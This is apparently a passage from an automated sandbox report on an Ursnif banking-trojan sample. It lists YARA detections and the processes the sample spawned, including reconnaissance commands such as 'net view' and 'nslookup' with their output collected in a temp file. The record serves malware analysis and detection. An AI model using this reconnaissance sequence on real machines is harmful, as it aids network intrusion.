Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000032.00000000.703035684.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000032.00000000.698826675.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000032.00000000.695593372.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exePID: 7060, Parent PID: 5020

General

Target ID:	51
Start time:	16:17:16
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6732, Parent PID: 3688

General

Target ID:	52
Start time:	16:17:22
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "net view >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exePID: 3784, Parent PID: 6732

General

Target ID:	53
Start time:	16:17:27
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: net.exePID: 6284, Parent PID: 6732

General

Target ID:	54
Start time:	16:17:28
Start date:	22/04/2022
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view
Imagebase:	0x7ff7e90e0000
File size:	56832 bytes
MD5 hash:	15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 3720, Parent PID: 3688

General

Target ID:	55
Start time:	16:17:29
Start date:	22/04/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff61beb0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6660, Parent PID: 3688

General

Target ID:	56
Start time:	16:17:40
Start date:	22/04/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Imagebase:	0xed0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.742734831.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000038.00000000.741896221.0000000003610000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000038.00000000.741217358.0000000003610000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.743014164.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.742810151.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.742565489.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.742635161.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.743129288.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.742454861.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.742926350.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000038.00000000.740581278.0000000003610000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000002.744378617.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000038.00000003.742968366.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exePID: 6980, Parent PID: 6660

General

Target ID:	57
Start time:	16:17:41
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6804, Parent PID: 3688

General

Target ID:	58
Start time:	16:17:42
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 6460, Parent PID: 6804

General

Target ID:	59
Start time:	16:17:43
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1012, Parent PID: 3688

General

Target ID:	60
Start time:	16:17:44
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exePID: 1268, Parent PID: 1012

General

Target ID:	61
Start time:	16:17:45
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language